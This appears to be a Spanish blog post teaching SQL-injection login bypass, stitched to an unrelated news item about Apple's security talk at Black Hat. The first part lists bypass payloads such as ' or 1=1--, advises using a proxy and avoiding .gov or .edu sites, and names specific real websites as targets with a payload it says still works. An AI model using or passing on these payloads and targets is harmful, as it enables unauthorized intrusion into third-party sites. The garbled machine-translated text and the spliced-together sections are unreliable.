Hackear una página web (Inyección SQL)Supongamos, un sitio tiene un formulario de acceso y sólo los usuarios registrados pueden ingresar al sitio. Ahora, digamos que quisieras pasar por alto el inicio de sesión y entrar en el sitio como usuario legítimo. Si
el inicio de sesión ScriptBlock no es verificada apropiadamente por el
programador puede tener la suerte de entrar en el sitio.Tu
podrías ser capaz de iniciar sesión en el sitio, sin saber el nombre de
usuario y contraseña para jugar de verdad con sólo interactuar con el
servidor de DB. Por lo tanto, no es una belleza la inyección de SQL?Veamos un ejemplo, donde el nombre de usuario admin con la contraseña pass123 puede registrarse en el sitio. Supongamos, la consulta SQL para esta se lleva a cabo de la siguiente manera:SELECCIONAR USUARIO de base de datos donde username = 'admin' AND password = 'pass123'Y si encima comando SELECT se evalúa verdadero, el usuario tendrá acceso al sitio no lo contrario. Piense en lo que podría hacer si el ScriptBlock no está esterilizado. Esto abre una puerta a los hackers acceder de manera ilegal en el sitio.
En este ejemplo, el atacante puede introducir los siguientes datos de usuario en el formulario de inicio de sesión:
nombre de usuario: a or 1 = 1--
contraseña: en blanco
Por lo tanto, esto haría que nuestra consulta sea:
SELECT USER from database WHERE username='a' or 1=1-- AND password=''
Tenga en cuenta que -- es el operador de comentario y cualquier cosa le va a ser ignorado como un comentario.
Existe otro operador de comentario que es: / *.
Así que nuestra consulta anterior se convierte en:
SELECT USER from database WHERE username='a' or 1=1
Ahora
bien, esta consulta se evalúa cierto incluso si no hay un usuario
llamado 'a' bcoz 1 = 1 es siempre verdad y la utilización OR hace que el
cambio ocurre cuando un query es verdad.
Y esto da acceso al panel de administración del sitio. No puede haber nombre de usuario y varias otras combinaciones de contraseñas para jugar con los sitios vulnerables. tú puedes crear tus propias combinaciones nuevas para el inicio de sesión del sitio
Pocos tales combinaciones son:
username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
hay muchas hojas de más trucos . Sólo google. De hecho, usted puede crear su propia combinación tal de eludir los inicios de sesión ..Eso es todo sobre cómo omitir los inicios de sesión.
Lista de inyección de:
---------------------------
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Así
es como funciona:
Bueno una inyección sql inyecta un código en la base
de datos mysql, que se pasa la sesión de seguridad del sitio.
Consejos:
* No intente esto en. Gob o sitios edu
* No intente esto en los sitios que se ven realmente publicidad
* Probar los sitios que te registran falsa de inicio de sesión
* Asegúrese de que no dice powered by y luego un nombre de la empresa, como por ejemplo un pearson
* Utilice un proxy si cree que puede quedar atrapado
Sitio web que utiliza: http://www.hockeyrecruit.com/admin/login.aspNombre de usuario: admincontraseña: 1'or'1 '= '1
Fuente: http://solankihackers.blogspot.com/2011/03/hacking-website-sql-injection.html
UN ATAQUE QUE TE FUNCIONAR
primero a buscar en google Admin Login.asp ingresamos a cualquier web que nos de google,
en mi caso usare http://www.udesa.co.za/admin/login.asp .
para logearnos usaremos el usuario Admin , y en contraseña colocaremos 1'or'1'='1 .
Entonces seria asi.
Username: Admin
Password: 1'or'1'='1
estaremos logeados como administrador sin contraseña xD,
asi podemos... meternos a una cuenta admin y administrar su base de
datos a su gusto, para algunas webs nesesitarian esconder su ip para
cambiar la base de datos, bueno es muy simple, yo lo use con udesa hace poquito y aun funciona xD Fuente: http://www.taringa.net/comunidades/hackthegame/5350429/Injection-sql---Admin-Login---Webs-vulnerables.html
y un consejo solo observen sin alterar ya que no tenemos el permiso : )
Bendiciones.
/ theglobeandmail.com
El director de la plataforma de programas de seguridad de Apple, Dallas De Atley, realizó una presentación sin precedentes durante más de una hora dentro de la 15ª conferencia Black Hat, que se está celebrando durante toda la semana en la capital del juego.
“Estamos muy contentos de estar aquí”, afirmó De Atley en la presentación de su discurso ante una sala repleta del casino Caesars Palace.
“Cuando estábamos desarrollando el iPhone, nos dimos cuenta de que había aspectos que le diferenciaban mucho de una computadora”, continuó.
“La seguridad es arquitectura: hay que construirla desde el principio, no son simplemente algunos códigos salpicados sobre el producto final”, aseguró.
Dallas De Atley abordó entonces varios temas controvertidos como son la encriptación, los programas clave u otras herramientas de seguridad utilizadas en el sistema iOS, que es el que funciona en los iPhone, iPad e iPod.
Los ataques de los piratas informáticos a los celulares y, especialmente, a los Apple o a aquellos gestionados por el sistema Adroid, de Google, es uno de los temas centrales de esta conferencia Black Hat, donde los desarrolladores han planteado sus dudas sobre el interés de los fabricantes en prestarle atención a la seguridad.
Al contrario de lo que hicieron otros ponentes, De Atley no respondió a las preguntas de los participantes y abandonó rápidamente la sala por una puerta lateral.
Más de 6.500 expertos en seguridad de alto nivel (especialistas de la seguridad informática, así como todo tipo de piratas informáticos) se reunieron esta semana en Las Vegas para asistir a la conferencia Black Hat y su equivalente alternativo, el Def Con.
fuente: http://www.abc.com.py/ciencia/apple-descubre-secretos-de-seguridad-a-un-auditorio-de-piratas-informaticos-430980.htmlhttp://www.abc.com.py/ciencia/apple-descubre-secretos-de-seguridad-a-un-auditorio-de-piratas-informaticos-430980.html
fuente: http://www.abc.com.py/ciencia/apple-descubre-secretos-de-seguridad-a-un-auditorio-de-piratas-informaticos-430980.htmlhttp://www.abc.com.py/ciencia/apple-descubre-secretos-de-seguridad-a-un-auditorio-de-piratas-informaticos-430980.html
